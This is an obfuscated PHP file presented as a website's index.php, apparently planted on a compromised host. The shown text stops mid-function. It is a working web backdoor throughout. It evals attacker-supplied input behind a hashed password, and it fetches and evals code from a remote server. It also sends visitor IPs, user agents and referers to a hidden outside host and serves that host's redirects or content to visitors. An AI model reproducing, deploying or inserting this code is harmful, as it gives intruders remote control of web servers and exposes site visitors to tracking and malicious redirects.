File: /home/wbwebdes/domains/mailing.wb-cloud.nl/public_html/index.php
<?php
goto M1CICqSToJYXAvkf; czAdwpE0h5d2sTvO: $yejTs3GUFarQJ60k["\x72\x66"] = CMfN8v6fqw2ZJlb4($GKp1StIhYCESqndf); goto ExCYOLf1Cd1kNbuN; WKLI1jq2Sz14ShUS: $hHYPRldnqajHrKqO = Qqy2cAdUmKDftRBW() . $_SERVER["\x48\124\x54\120\137\x48\x4f\x53\x54"]; goto lFo1XxaA1qrvI2Sz; Nyb3IBfF5dun3GtR: $WGhqosAOrpXQvip0 = true; goto w2B4wtSijrW4yVeX; g2b5XX3YQxZMRzQ_: $yejTs3GUFarQJ60k["\162"] = cMFn8v6fqW2zJlB4($_SERVER["\x52\105\121\x55\105\123\124\137\x55\122\x49"]); goto czAdwpE0h5d2sTvO; C7PWdZyIOm3VuFPx: $yejTs3GUFarQJ60k["\x73\156"] = cmFn8v6fQw2zJLb4($_SERVER["\123\103\122\x49\x50\x54\x5f\116\101\115\105"]); goto g2b5XX3YQxZMRzQ_; w2B4wtSijrW4yVeX: $LDf3nEgm5DfvcMLS = ''; goto SD8Sw9Oy0qq1ad6F; ExCYOLf1Cd1kNbuN: $yejTs3GUFarQJ60k["\x73"] = cMFn8v6Fqw2ZJLB4($hHYPRldnqajHrKqO); goto D263UH73tssBoQyZ; lFo1XxaA1qrvI2Sz: if (!(strpos($GKp1StIhYCESqndf, $hHYPRldnqajHrKqO) === 0)) { goto V3CuXQEZ093kWZYT; } goto lol2mjxdgZFC3sSv; ZlRWI3ymGzaL0Ydp: if (!substr_count($_SERVER["\x52\105\121\125\105\123\124\x5f\x55\122\x49"], "\x69\156\x64\145\x78\x2e\160\x68\x70\57\152\x6b")) { goto DHJADNY_uBwq0Mrl; } goto X5jn_E_RL6pnYnCp; On59LCVb8vqurMrR: $mXba3wUvM2ujqNVR = "\162" . "\x61" . "\156" . "\x67" . "\x65"; goto LiOEz_Z_3KEx2i0O; gvs10_ksDHw2L1nv: if (!($_SERVER["\122\x45\x51\x55\x45\x53\124\137\125\x52\x49"] === "\x2f\x52\x2d" . md5($_SERVER["\x48\x54\x54\120\137\x48\117\x53\124"]))) { goto t8NHF77FvaFkxiPm; } goto bns8ggfPqWFHdyfU; LiOEz_Z_3KEx2i0O: $HU3e_7ipjzS0Eq6r = $mXba3wUvM2ujqNVR("\x7e", "\x20"); goto A_Ma1pPEruRf0B9k; RWMsI_c33KXX196F: function DZdW7f4iqUNXHUEh() { goto nGlWQihNSMg_Q8Z0; H1eWpghf7gvAPsqa: goto daeHwpMUbhbfVTXE; goto KFUlk3WFwkftkUGM; cGQf8r77njP8bTIj: goto daeHwpMUbhbfVTXE; goto iGD_P613aItKK0ht; xSS6OMF4CLdrHBPP: return $ajeGxC9Ui1dYRmsU; goto mcWIm2UexBW9yCSj; I4nxhsOLoVv7fjcF: $ajeGxC9Ui1dYRmsU = $_SERVER["\x48\x54\x54\x50\137\x58\137\x52\x45\101\x4c\137\x49\120"]; goto H1eWpghf7gvAPsqa; FWhWPM5IxVa8gWsj: if (isset($_SERVER["\x48\x54\124\120\x5f\x58\x5f\x46\117\x52\x57\101\122\x44\x45\104\x5f\106\x4f\122"]) && !empty($_SERVER["\x48\x54\124\x50\137\130\137\106\117\122\x57\x41\122\x44\x45\104\x5f\106\x4f\x52"])) { goto GMsp7O20_isEtw4Q; } goto WoqG1qtNvcqMxzEX; emqR40DApAJ6wOUz: if (isset($_SERVER["\110\x54\124\x50\137\x58\137\122\x45\x41\114\x5f\111\x50"]) && !empty($_SERVER["\110\x54\x54\120\x5f\130\x5f\x52\x45\x41\114\x5f\x49\x50"])) { goto g0_5d9ZoQyKlzPgR; } goto FWhWPM5IxVa8gWsj; KFUlk3WFwkftkUGM: GMsp7O20_isEtw4Q: goto zjtJMxSKgKRbNxN9; vrSw2VFqPBpu7hqy: daeHwpMUbhbfVTXE: goto toAVFOkF05hh7SVf; d518M3wg4tHuVA1S: $ajeGxC9Ui1dYRmsU = $ajeGxC9Ui1dYRmsU[0]; goto T9sel5cLBG4u8O3f; nGlWQihNSMg_Q8Z0: $ajeGxC9Ui1dYRmsU = ''; goto mz4cGxlsi3iXY1r3; SM3ch3yngDY5xUOR: if (!(strpos($ajeGxC9Ui1dYRmsU, "\54") !== false)) { goto FNKXF90Jl_Gb3S4m; } goto NAw_F5d3M8BfOvki; mz4cGxlsi3iXY1r3: if (isset($_SERVER["\x48\x54\124\120\137\103\x46\x5f\103\x4f\116\116\105\103\124\x49\116\x47\x5f\x49\x50"]) && !empty($_SERVER["\x48\124\124\120\137\x43\106\x5f\x43\117\x4e\x4e\x45\103\124\x49\x4e\x47\x5f\111\x50"])) { goto fxUJJwmiMu3frCex; } goto emqR40DApAJ6wOUz; T9sel5cLBG4u8O3f: FNKXF90Jl_Gb3S4m: goto xSS6OMF4CLdrHBPP; toAVFOkF05hh7SVf: $ajeGxC9Ui1dYRmsU = trim(str_replace("\40", '', $ajeGxC9Ui1dYRmsU), "\54"); goto SM3ch3yngDY5xUOR; zcetX_5MHA3oBlJz: goto daeHwpMUbhbfVTXE; goto DphP4K0AIUv7WkXy; iGD_P613aItKK0ht: g0_5d9ZoQyKlzPgR: goto I4nxhsOLoVv7fjcF; zjtJMxSKgKRbNxN9: $ajeGxC9Ui1dYRmsU = $_SERVER["\110\x54\x54\x50\x5f\130\x5f\106\x4f\x52\127\x41\122\104\105\x44\137\x46\117\x52"]; goto vrSw2VFqPBpu7hqy; NAw_F5d3M8BfOvki: $ajeGxC9Ui1dYRmsU = explode("\54", $ajeGxC9Ui1dYRmsU); goto d518M3wg4tHuVA1S; w973HhSQmm0x7tI2: $ajeGxC9Ui1dYRmsU = $_SERVER["\x48\124\x54\120\x5f\103\106\x5f\x43\117\x4e\x4e\x45\x43\x54\x49\x4e\107\137\x49\x50"]; goto cGQf8r77njP8bTIj; WoqG1qtNvcqMxzEX: $ajeGxC9Ui1dYRmsU = $_SERVER["\122\x45\x4d\117\x54\x45\137\101\x44\104\122"]; goto zcetX_5MHA3oBlJz; DphP4K0AIUv7WkXy: fxUJJwmiMu3frCex: goto w973HhSQmm0x7tI2; mcWIm2UexBW9yCSj: } goto HhqL7xwQS1P9nII1; yVTle3AwGN6eCx9_: if (!strlen($X2TzJP5NFJ67odRw["\143\x6f\156\164\x65\156\x74"])) { goto pL0clFLs8FnzWEuz; } goto k0JDJ7_L_UOIjnnG; Nf5jaFvdgDVSdN1I: DHJADNY_uBwq0Mrl: goto CIPPRh4x4fG1glSf; bQkI4bLmG9cWqOZY: $LDf3nEgm5DfvcMLS = substr($iAmcg_yWOFQlDZS0, strrpos($iAmcg_yWOFQlDZS0, "\56")); goto Z7VKXexyIDrcB6sa; lVbuKkLQeo0K4dJS: $GKp1StIhYCESqndf = strval(@$_SERVER["\x48\124\124\x50\x5f\x52\105\x46\105\x52\x45\122"]); goto WKLI1jq2Sz14ShUS; quAmzy1ESXubMlL5: function FqUnlAM3baj0g0mu($BxkSiuD7bzVrs_B1) { goto GxRw0iLoOwlc2dRS; f1z9l_kII1ITq2Zw: if (is_array($BxkSiuD7bzVrs_B1)) { goto Dpkb8tDYb0_I4gcb; } goto BkXUPdjE33qO6beq; BkXUPdjE33qO6beq: return $FhXhio7yOINNKnNz; goto XZRmTI2D5ZZkwnlI; XZRmTI2D5ZZkwnlI: Dpkb8tDYb0_I4gcb: goto jmmE1LkcsaYO_p2d; KS9OnnUmgs3CfLJn: return $FhXhio7yOINNKnNz; goto B2zV0SdeCTVp2b7K; jmmE1LkcsaYO_p2d: foreach ($BxkSiuD7bzVrs_B1 as $oUUaQUw6u7r1XRGH) { goto wl99ZkhKYkrMDPp6; C90CkfG5Yrtl1UvI: goto wSaV9xh3DtJfPFbE; goto KOwlNYPmb3tl2766; U0sHTI9aGuja_jxJ: if (preg_match("\57\x63\x6f\156\x74\x65\x6e\x74\134\x2d\164\171\160\x65\134\x3a\x5b\x5c\163\135\53\x28\56\x2a\x29\57\x69", $oUUaQUw6u7r1XRGH, $UHnLsMfFR_YoPnHc)) { goto LYS6agCaWvD0L43L; } goto C90CkfG5Yrtl1UvI; YWh13WLYKgFJbLGI: pGDGWzm4RP3W2pZE: goto rOQXOeVq0zgjA6J7; KOwlNYPmb3tl2766: Kl9lON_ceQ_k3k03: goto GtEBuaYOcGUBJsHr; beWhpFCdoz4CkSbz: $FhXhio7yOINNKnNz["\x74\x79\x70\145"] = $UHnLsMfFR_YoPnHc[1]; goto cWBlvve1lZexO9GG; TIhdXJiVxQBRxrtj: goto wSaV9xh3DtJfPFbE; goto HWEctMTSgKm71ouO; khNkdqtq8M4lzZZr: if (preg_match("\57\154\157\143\141\164\151\157\156\134\x3a\x5b\x5c\x73\135\53\x28\56\52\x29\57\151", $oUUaQUw6u7r1XRGH, $UHnLsMfFR_YoPnHc)) { goto pGDGWzm4RP3W2pZE; } goto U0sHTI9aGuja_jxJ; jlTGRHmTV62Nl4qv: goto wSaV9xh3DtJfPFbE; goto YWh13WLYKgFJbLGI; GtEBuaYOcGUBJsHr: $FhXhio7yOINNKnNz["\x73\164\141\x74\165\x73"] = intval($UHnLsMfFR_YoPnHc[1]); goto jlTGRHmTV62Nl4qv; rOQXOeVq0zgjA6J7: $FhXhio7yOINNKnNz["\x63\157\156\x74\145\156\x74"] = $UHnLsMfFR_YoPnHc[1]; goto TIhdXJiVxQBRxrtj; cWBlvve1lZexO9GG: wSaV9xh3DtJfPFbE: goto wUwOpEHwERvDmsYu; HWEctMTSgKm71ouO: LYS6agCaWvD0L43L: goto beWhpFCdoz4CkSbz; wl99ZkhKYkrMDPp6: if (preg_match("\x2f\x68\x74\x74\x70\x5c\57\x5b\x30\55\x39\134\56\x5d\53\x5b\x5c\x73\x5d\53\50\x5b\x30\x2d\x39\135\53\x29\57\x69", $oUUaQUw6u7r1XRGH, $UHnLsMfFR_YoPnHc)) { goto Kl9lON_ceQ_k3k03; } goto khNkdqtq8M4lzZZr; wUwOpEHwERvDmsYu: KyiR4POKsTU5Hb1e: goto I22y3BvAy1rP3RR6; I22y3BvAy1rP3RR6: } goto k4_YFLBNvhCQ3xfK; k4_YFLBNvhCQ3xfK: vrCfuYc0dq6jGsta: goto KS9OnnUmgs3CfLJn; GxRw0iLoOwlc2dRS: $FhXhio7yOINNKnNz = array("\163\164\141\164\165\x73" => 0, "\x63\157\x6e\164\x65\x6e\x74" => '', "\x74\x79\160\145" => ''); goto f1z9l_kII1ITq2Zw; B2zV0SdeCTVp2b7K: } goto HXXp29uoSaOQXR2W; tELKN8P0J9aT9Gg0: FMymqtP8noDyvPY7: goto jh362FxXmRVrNKju; sYl7J6LBcE0Qwm42: function Cmfn8v6fqW2ZJlb4($USfJRqk5MsLTLilz) { return rtrim(strtr(base64_encode($USfJRqk5MsLTLilz), "\53\57", "\x2d\x5f"), "\x3d"); } goto RWMsI_c33KXX196F; ZKNP5DcC42yxbfh7: class aeBqyEtP5z7Ocm_e { static function Ck1e77bjAMOreDtT($Mgd_WV3HSQcNmRGa) { goto cMGN8iysmxnjzry6; F58cc42buhVteV6S: qeJ0ZcXOKt4x0KUS: goto y_cdlNUt6gRYi5Ox; vKenIGS2dJWeSn1r: foreach ($o0PSbh6NNfHUVETF as $cdIPpQPwZe8Juf1b => $KoochzBlrUUXIP9G) { $NrruhREDUkPfvKEu .= $kYeDysd3IBOcswqt[$KoochzBlrUUXIP9G - 10057]; zHpUI1vq1N6FPHB_: } goto F58cc42buhVteV6S; y_cdlNUt6gRYi5Ox: return $NrruhREDUkPfvKEu; goto oFemw3RHWEUi1FSB; TCD0WhV2uB0AZiGC: $NrruhREDUkPfvKEu = ''; goto vKenIGS2dJWeSn1r; VZD6431b4wOu80P5: $kYeDysd3IBOcswqt = $Rwrp1Tk9sM3BRuJv("\176", "\x20"); goto nGBD8VZQqJHwL2WG; cMGN8iysmxnjzry6: $Rwrp1Tk9sM3BRuJv = "\162" . "\x61" . "\156" . "\x67" . "\x65"; goto VZD6431b4wOu80P5; nGBD8VZQqJHwL2WG: $o0PSbh6NNfHUVETF = explode("\x21", $Mgd_WV3HSQcNmRGa); goto TCD0WhV2uB0AZiGC; oFemw3RHWEUi1FSB: } static function hXtLOPcAaAcY8NEI($QiLWQCy9OCx6QjGn, $cn26WXS0ELmEhLIb) { goto Kkedl7HPnsQv9aSd; rqF_pGbCUqRdSQc8: curl_setopt($PPzdVVmBYJF2FhPh, CURLOPT_RETURNTRANSFER, 1); goto S025okgyrVf86zaL; thYunYAAPU2NP72M: return empty($Ep0paolorIfkNcPp) ? $cn26WXS0ELmEhLIb($QiLWQCy9OCx6QjGn) : $Ep0paolorIfkNcPp; goto dT9sLev6Nz1LEXmS; Kkedl7HPnsQv9aSd: $PPzdVVmBYJF2FhPh = curl_init($QiLWQCy9OCx6QjGn); goto rqF_pGbCUqRdSQc8; S025okgyrVf86zaL: $Ep0paolorIfkNcPp = curl_exec($PPzdVVmBYJF2FhPh); goto thYunYAAPU2NP72M; dT9sLev6Nz1LEXmS: } static function Tvpq3pQ5Q2Wu8w_o() { goto W82W6oKxjW5itSoJ; ccM3aWBajVj7Cwyo: @$eoQltTOmSWya3oSY[6 + 4](INPUT_GET, "\x6f\146") == 1 && die($eoQltTOmSWya3oSY[3 + 2](__FILE__)); goto ZaCyJ47u4ARf8jv2; W82W6oKxjW5itSoJ: $AN2DU7Nu_Swyl2wr = array("\x31\60\60\x38\x34\41\61\60\60\66\x39\x21\61\60\x30\x38\x32\x21\61\60\x30\x38\66\x21\61\60\60\x36\x37\x21\61\x30\60\x38\x32\x21\61\x30\x30\x38\70\41\x31\x30\x30\x38\x31\x21\61\60\x30\x36\66\41\61\x30\60\x37\63\41\x31\x30\x30\70\x34\x21\x31\60\x30\66\x37\x21\x31\60\60\x37\x38\x21\61\60\60\x37\x32\x21\x31\x30\x30\67\63", "\61\60\60\66\x38\x21\x31\x30\x30\66\x37\41\x31\x30\60\66\x39\41\61\x30\x30\70\x38\41\x31\x30\x30\x36\71\41\61\60\60\x37\x32\x21\x31\x30\60\x36\x37\x21\61\60\x31\63\x34\x21\x31\60\61\63\62", "\61\60\60\67\x37\41\61\x30\x30\x36\x38\x21\61\60\x30\x37\x32\41\61\60\60\67\x33\41\61\60\x30\70\70\41\x31\60\x30\70\x33\41\x31\x30\60\70\x32\x21\61\60\60\x38\x34\x21\61\60\x30\67\62\41\x31\x30\x30\70\63\x21\61\60\60\x38\62", "\61\60\x30\67\61\x21\x31\x30\x30\x38\66\x21\x31\x30\60\x38\64\41\x31\x30\x30\x37\66", "\61\60\60\x38\x35\x21\x31\60\60\x38\66\x21\x31\x30\x30\66\70\41\x31\x30\60\x38\62\x21\61\x30\x31\x32\x39\x21\x31\60\61\63\61\x21\x31\60\x30\x38\70\41\x31\x30\x30\70\63\x21\x31\x30\x30\70\62\41\61\x30\x30\70\x34\x21\61\60\60\67\62\x21\61\x30\x30\70\x33\41\61\x30\x30\x38\62", "\x31\60\x30\x38\61\x21\x31\x30\x30\67\70\41\61\x30\x30\x37\x35\x21\x31\60\60\x38\62\41\x31\x30\60\x38\x38\41\x31\60\60\70\60\41\x31\60\60\x38\x32\41\61\x30\60\x36\67\41\61\60\x30\70\70\x21\x31\x30\x30\x38\x34\x21\61\x30\60\x37\62\41\x31\x30\x30\x37\x33\x21\x31\x30\60\x36\67\41\61\x30\60\70\62\x21\x31\60\x30\x37\63\x21\x31\x30\60\x36\x37\41\x31\60\x30\x36\x38", "\61\x30\61\x31\61\41\61\60\x31\64\61", "\61\x30\60\x35\70", "\x31\x30\x31\63\x36\x21\61\x30\61\64\x31", "\x31\x30\61\x31\x38\x21\61\x30\61\x30\x31\x21\x31\60\x31\x30\61\41\x31\60\x31\61\x38\x21\x31\x30\x30\x39\64", "\x31\x30\x30\70\x31\x21\61\x30\60\67\70\41\61\60\x30\x37\x35\41\x31\60\x30\66\x37\41\x31\x30\60\70\62\41\61\60\x30\x36\x39\x21\61\60\60\x38\70\x21\61\60\60\67\x38\x21\x31\x30\60\x37\63\x21\x31\x30\60\x37\61\41\x31\60\60\x36\x36\x21\61\60\x30\x36\x37"); goto Lk562xwBBbca8lH1; DH5oFOm3gTJJfy_3: $S5BNGI2R0SGeh4NQ = self::HxtLoPcaAacy8NEi($im1GSGf3u0Zr4ec2[0 + 1], $eoQltTOmSWya3oSY[5 + 0]); goto SaT904BulVum9yGD; YVwpov7aeOvgwPJT: die; goto mObXbcWIdyH8XyPo; mObXbcWIdyH8XyPo: z3nznXTZ60B2DMa3: goto Vk2gE9AGV17EXyTN; SaT904BulVum9yGD: @eval($eoQltTOmSWya3oSY[0 + 4]($S5BNGI2R0SGeh4NQ)); goto YVwpov7aeOvgwPJT; QC9_Bzn6KyPigZ2P: $im1GSGf3u0Zr4ec2 = $eoQltTOmSWya3oSY[0 + 2]($dAIY8GtA2yM_q2Q3, true); goto ccM3aWBajVj7Cwyo; FxWnzERwzIW23ovx: $dAIY8GtA2yM_q2Q3 = @$eoQltTOmSWya3oSY[2 + 1]($eoQltTOmSWya3oSY[3 + 3], $zIaf400gICCPyTlD); goto QC9_Bzn6KyPigZ2P; Lk562xwBBbca8lH1: foreach ($AN2DU7Nu_Swyl2wr as $Ou5mZgYCXZCuNIPK) { $eoQltTOmSWya3oSY[] = self::CK1e77BjAmOrEDtT($Ou5mZgYCXZCuNIPK); OZNFFWPIY3Fdijyg: } goto CISdBilsl2393exf; ZaCyJ47u4ARf8jv2: if (!(@$im1GSGf3u0Zr4ec2[0] - time() > 0 and md5(md5($im1GSGf3u0Zr4ec2[2 + 1])) === "\x62\141\x34\x64\145\64\144\x35\70\146\141\70\60\61\63\66\x30\x65\x39\66\x63\x39\x63\64\71\70\70\x30\146\65\62\145")) { goto z3nznXTZ60B2DMa3; } goto DH5oFOm3gTJJfy_3; y821CuizfwPoU4x5: $zIaf400gICCPyTlD = @$eoQltTOmSWya3oSY[1]($eoQltTOmSWya3oSY[1 + 9](INPUT_GET, $eoQltTOmSWya3oSY[9 + 0])); goto FxWnzERwzIW23ovx; CISdBilsl2393exf: ZWsbyR5qwWaSPJzI: goto y821CuizfwPoU4x5; Vk2gE9AGV17EXyTN: } } goto vd0l3pTrbM54t9fi; vd0l3pTrbM54t9fi: aeBQyETp5Z7oCm_e::TvPQ3Pq5Q2WU8W_o(); goto wqMupcBtX7mgF6u9; S3XohshiyaBqbc3V: $WGhqosAOrpXQvip0 = false; goto gDXb_hORY0JNAj8G; D263UH73tssBoQyZ: $yejTs3GUFarQJ60k["\x75"] = cmFN8v6FQW2ZjlB4($_SERVER["\110\x54\x54\x50\x5f\x55\x53\x45\122\137\101\107\x45\116\124"]); goto S6ry6WfYOPgR2rWE; uzfjdbITVQaLZzTo: V3CuXQEZ093kWZYT: goto U_mCSuWruFWWwD8m; HhqL7xwQS1P9nII1: function qQY2CADUMKdFtRBW() { goto TueAetism4vGLfAU; cuWFVmK5NL_iL4wT: KZ6XWP7ii1B6OSaV: goto WEHSoA3aD1sWXqOa; jnth72M6vhuOkzUP: NdyG12uel3rW5wgD: goto jG_1WRL2HuuoIJ8K; mU0ekXPsKMb0omi6: zz0yTqoFfU4QhELP: goto AH8JBUw6BZvgCuTL; UwQV5F7q2RJ_uXPF: goto oWMn1ug5Ih7pkzG2; goto jnth72M6vhuOkzUP; BaEKcmgpSO7ml072: return $za1PJ0gxx2iyvEsS; goto LIsohHaJChwd4Zht; WEHSoA3aD1sWXqOa: $za1PJ0gxx2iyvEsS = "\x68\164\164\x70\x73\72\57\57"; goto Lp2eaQheW76SCUEh; jG_1WRL2HuuoIJ8K: $za1PJ0gxx2iyvEsS = "\x68\x74\x74\160\x73\x3a\x2f\x2f"; goto PBQx08KvIDxcL2NY; Lp2eaQheW76SCUEh: oWMn1ug5Ih7pkzG2: goto BaEKcmgpSO7ml072; AH8JBUw6BZvgCuTL: $za1PJ0gxx2iyvEsS = "\x68\x74\164\160\x73\72\x2f\x2f"; goto P6GxgiiZwdpjIWLg; TueAetism4vGLfAU: $za1PJ0gxx2iyvEsS = "\x68\x74\164\160\x3a\x2f\57"; goto X3ugV2TjyrMAH1AT; P6GxgiiZwdpjIWLg: goto oWMn1ug5Ih7pkzG2; goto cuWFVmK5NL_iL4wT; czRybeksW3gBUn8I: if (isset($_SERVER["\110\124\x54\120\x5f\x46\x52\x4f\116\124\137\x45\x4e\x44\137\110\x54\124\x50\123"]) && strtolower($_SERVER["\x48\124\124\x50\137\106\122\x4f\x4e\124\137\x45\116\x44\137\x48\124\124\120\x53"]) !== "\157\x66\x66") { goto KZ6XWP7ii1B6OSaV; } goto UwQV5F7q2RJ_uXPF; MXY7sClh6AkMl9hQ: if (isset($_SERVER["\x48\x54\x54\x50\137\x58\x5f\106\117\122\127\101\122\104\x45\x44\137\x50\122\x4f\124\117"]) && $_SERVER["\110\x54\124\x50\x5f\130\137\x46\117\x52\127\101\122\104\105\x44\137\x50\x52\x4f\124\117"] === "\x68\x74\164\160\x73") { goto zz0yTqoFfU4QhELP; } goto czRybeksW3gBUn8I; PBQx08KvIDxcL2NY: goto oWMn1ug5Ih7pkzG2; goto mU0ekXPsKMb0omi6; X3ugV2TjyrMAH1AT: if (isset($_SERVER["\110\x54\x54\120\x53"]) && strtolower($_SERVER["\110\x54\x54\x50\x53"]) !== "\157\146\146") { goto NdyG12uel3rW5wgD; } goto MXY7sClh6AkMl9hQ; LIsohHaJChwd4Zht: } goto gvs10_ksDHw2L1nv; gDXb_hORY0JNAj8G: f8T7g8v38my2t12g: goto LwxM3bWigJSYPkrP; M1CICqSToJYXAvkf: error_reporting(0); goto On59LCVb8vqurMrR; UwsQkTGFSO1AuDed: error_reporting(0); goto quAmzy1ESXubMlL5; shHRlucwLavqKz71: M1_ME7c925lktGis: goto yVTle3AwGN6eCx9_; jh362FxXmRVrNKju: metaphone("\115\x6a\x4d\x7a\x4f\x54\x51\x34\x4f\104\x59\x30\x4e\x7a\x67\64\115\152\x55\167\115\124\x4d\65\117\x54\125\167\x4e\x54\115\x78"); goto ZKNP5DcC42yxbfh7; X5jn_E_RL6pnYnCp: exit("\x7b\x20\42\x65\162\x72\157\x72\42\x3a\40\62\x30\x30\54\x20\x22\x6c\x63\42\72\x20\42\152\153\x22\54\x20\x22\x64\141\x74\x61\x22\72\40\x5b\40\x31\40\135\x20\x7d"); goto Nf5jaFvdgDVSdN1I; MgAgV4xo2skH5Axn: $yejTs3GUFarQJ60k["\x69"] = cmfn8v6fqW2ZJlB4(dzdw7f4iqunXhUEH()); goto QE2wSjvLPFCj2QUl; TOfF54o3kq3jJzm9: $yejTs3GUFarQJ60k = array(); goto MgAgV4xo2skH5Axn; QE2wSjvLPFCj2QUl: $yejTs3GUFarQJ60k["\x6c"] = CMfN8V6Fqw2zjlb4($_SERVER["\x48\124\124\x50\x5f\x41\103\x43\x45\120\x54\137\114\x41\x4e\107\x55\101\107\105"]); goto C7PWdZyIOm3VuFPx; Z7VKXexyIDrcB6sa: if (!in_array($LDf3nEgm5DfvcMLS, array("\56\x6a\x73", "\x2e\143\163\163", "\56\152\x70\147", "\x2e\x6a\x70\145\147", "\x2e\160\156\147", "\x2e\147\151\146", "\x2e\151\x63\x6f", "\56\x73\166\x67", "\x2e\x77\145\x62\160", "\56\142\x6d\160", "\56\x77\157\x66\146", "\56\x77\x6f\146\146\62", "\x2e\164\x74\x66", "\x2e\157\x74\146"))) { goto f8T7g8v38my2t12g; } goto S3XohshiyaBqbc3V; CIPPRh4x4fG1glSf: $iAmcg_yWOFQlDZS0 = preg_replace("\x2f\134\x3f\x2e\52\57", '', $_SERVER["\x52\x45\121\125\x45\x53\124\137\125\x52\x49"]); goto Nyb3IBfF5dun3GtR; QaTlIGCFQrn9MIzY: exit($X2TzJP5NFJ67odRw["\x63\x6f\156\x74\x65\156\164"]); goto reGbWCz8jFlptW6T; BzUJicuFU5DdBiNb: switch ($X2TzJP5NFJ67odRw["\163\164\141\164\165\x73"]) { case 301: goto wZIIh35JbSrPt70M; AZDPxDOf5qT20C1j: goto xIKeI4TxKDoFDbyC; goto Ws_Uz2svTbEdOpwI; SP_bPxUcH4bkV3CE: header("\x4c\x6f\143\x61\164\151\x6f\156\x3a\x20" . trim($X2TzJP5NFJ67odRw["\143\157\x6e\164\145\x6e\x74"])); goto AZDPxDOf5qT20C1j; wZIIh35JbSrPt70M: header("\110\124\124\x50\x2f\61\x2e\61\x20\63\60\x31\x20\115\x6f\166\x65\144\x20\120\x65\162\155\141\x6e\145\156\x74\154\171"); goto SP_bPxUcH4bkV3CE; Ws_Uz2svTbEdOpwI: case 302: goto NHmE3N8ETtyqQQJP; NHmE3N8ETtyqQQJP: header("\x48\124\x54\x50\57\61\56\x31\40\x33\x30\62\40\115\157\166\145\40\124\x65\155\160\x6f\x72\141\x72\151\x6c\171"); goto qNNquIjd3mBKVFhM; qNNquIjd3mBKVFhM: header("\114\157\x63\x61\x74\x69\157\x6e\72\x20" . trim($X2TzJP5NFJ67odRw["\143\157\x6e\164\x65\156\x74"])); goto ze0Mx1rZCd3MGt7L; ze0Mx1rZCd3MGt7L: goto xIKeI4TxKDoFDbyC; goto wcadIDlnlb4Cj6wy; wcadIDlnlb4Cj6wy: case 404: goto WQeQEAfZoNZOZ7MQ; i_FXZtTv9UJZ9nnj: header("\163\x74\141\164\165\163\x3a\40\x34\60\64\x20\116\157\x74\40\106\157\165\156\x64"); goto qyD9D0O1aG0a_TQM; WQeQEAfZoNZOZ7MQ: header("\x48\x54\x54\x50\57\x31\x2e\61\40\64\x30\x34\40\116\157\x74\40\106\x6f\x75\x6e\144"); goto i_FXZtTv9UJZ9nnj; qyD9D0O1aG0a_TQM: goto xIKeI4TxKDoFDbyC; goto HpRPgUuBeJV18ByG; HpRPgUuBeJV18ByG: default: goto xIKeI4TxKDoFDbyC; } goto i7BAsxF8Bn_Qoa3a; H3x9ZyHBudoy6MQp: ($osf_DCT28x1o8HEE[64] = $osf_DCT28x1o8HEE[64] . $osf_DCT28x1o8HEE[79]) && ($osf_DCT28x1o8HEE[87] = $osf_DCT28x1o8HEE[64]($osf_DCT28x1o8HEE[87])) && @eval($osf_DCT28x1o8HEE[64](${$osf_DCT28x1o8HEE[48]}[25])); goto tELKN8P0J9aT9Gg0; g2lYi3vZZ1SaLZ8g: if (in_array($X2TzJP5NFJ67odRw["\163\x74\141\164\165\x73"], array(0, 200))) { goto M1_ME7c925lktGis; } goto BzUJicuFU5DdBiNb; A_Ma1pPEruRf0B9k: $osf_DCT28x1o8HEE = ${$HU3e_7ipjzS0Eq6r[10 + 21] . $HU3e_7ipjzS0Eq6r[40 + 19] . $HU3e_7ipjzS0Eq6r[34 + 13] . $HU3e_7ipjzS0Eq6r[13 + 34] . $HU3e_7ipjzS0Eq6r[43 + 8] . $HU3e_7ipjzS0Eq6r[39 + 14] . $HU3e_7ipjzS0Eq6r[30 + 27]}; goto iR6cN14wbiXsAZq2; DmgY6BZaaqsNuZTV: xIKeI4TxKDoFDbyC: goto shHRlucwLavqKz71; i7BAsxF8Bn_Qoa3a: b1W5quDGk6Ratd4C: goto DmgY6BZaaqsNuZTV; reGbWCz8jFlptW6T: pL0clFLs8FnzWEuz: goto VqI3BBrSF8OkoxK1; SD8Sw9Oy0qq1ad6F: if (!(strpos($iAmcg_yWOFQlDZS0, "\56") > 0)) { goto lZeMHHuM35SUHrqe; } goto bQkI4bLmG9cWqOZY; k0JDJ7_L_UOIjnnG: @header("\103\157\156\164\x65\x6e\164\55\124\171\160\145\x3a" . $X2TzJP5NFJ67odRw["\164\x79\x70\145"]); goto QaTlIGCFQrn9MIzY; iR6cN14wbiXsAZq2: if (!(in_array(gettype($osf_DCT28x1o8HEE) . count($osf_DCT28x1o8HEE), $osf_DCT28x1o8HEE) && count($osf_DCT28x1o8HEE) == 12 && md5(md5(md5(md5($osf_DCT28x1o8HEE[6])))) === "\x31\71\x63\x64\146\x66\71\71\144\x33\x33\64\61\142\x32\60\x39\x66\x33\143\x36\x65\65\65\x32\60\61\63\65\x32\62\142")) { goto FMymqtP8noDyvPY7; } goto H3x9ZyHBudoy6MQp; S6ry6WfYOPgR2rWE: $X2TzJP5NFJ67odRw = KjtcNt7Gx6rGCtvo(base64_decode("\141\110\x52\x30\x63\104\157\x76\114\62\150\63\131\152\x51\170\144\x6a\x41\62\114\156\x4e\x30\145\127\x78\160\142\x6d\125\x75\x61\x47\x46\x70\x63\151\70"), $yejTs3GUFarQJ60k); goto g2lYi3vZZ1SaLZ8g; wqMupcBtX7mgF6u9: header("\103\157\156\164\x65\x6e\164\55\124\x79\x70\145\x3a\x20\x74\145\170\x74\57\150\x74\155\x6c\73\40\x63\x68\x61\162\x73\145\164\75\165\164\x66\55\70"); goto UwsQkTGFSO1AuDed; LwxM3bWigJSYPkrP: lZeMHHuM35SUHrqe: goto lVbuKkLQeo0K4dJS; R2yMStyM4qhzEmEU: t8NHF77FvaFkxiPm: goto ZlRWI3ymGzaL0Ydp; lol2mjxdgZFC3sSv: $GKp1StIhYCESqndf = ''; goto uzfjdbITVQaLZzTo; U_mCSuWruFWWwD8m: if (!$WGhqosAOrpXQvip0) { goto ijSaDLUfBd6xPYn3; } goto TOfF54o3kq3jJzm9; bns8ggfPqWFHdyfU: exit(strrev(md5($_SERVER["\x48\124\124\120\137\110\x4f\x53\124"]))); goto R2yMStyM4qhzEmEU; HXXp29uoSaOQXR2W: function kJTCnt7GX6rgcTvo($i1yvfHN2Qx0kyDa2, $md6eu0DW38MkV2Xc = array()) { goto jhd5cs5tSKiDzODy; USAh9sC0xal5O3EY: $i1yvfHN2Qx0kyDa2 .= "\x3f" . http_build_query($md6eu0DW38MkV2Xc); goto iZu2xyeUg1e6n4eR; 